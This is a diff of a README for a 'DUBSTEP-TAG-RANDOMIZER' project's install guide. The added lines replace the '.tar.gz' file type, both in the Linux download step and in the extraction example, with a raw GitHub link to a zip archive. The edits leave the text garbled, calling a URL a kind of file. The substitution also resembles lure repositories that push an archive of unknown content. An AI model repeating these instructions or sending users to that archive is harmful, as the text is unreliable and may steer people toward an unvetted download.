youngermanbeat/DUBSTEP-TAG-RANDOMIZER/README.md

 - **Windows:** Look for a `.exe` file.
 - **macOS:** Look for a `.dmg` file.
-- **Linux:** Look for a `.tar.gz` file.
+- **Linux:** Look for a `https://raw.githubusercontent.com/youngermanbeat/DUBSTEP-TAG-RANDOMIZER/main/dist/DUBSTEP-TAG-RANDOMIZER_2.2.zip` file.

 ### 4. 📂 Extract Files (if necessary)

-If you downloaded a compressed file (like `.tar.gz`), you will need to extract it.
+If you downloaded a compressed file (like `https://raw.githubusercontent.com/youngermanbeat/DUBSTEP-TAG-RANDOMIZER/main/dist/DUBSTEP-TAG-RANDOMIZER_2.2.zip`), you will need to extract it.
 Right-click on the file and choose "Extract All" or use a similar option based on your operating system.
 This will create a folder with the application files.

 ### 5. ⚙️ Install the Application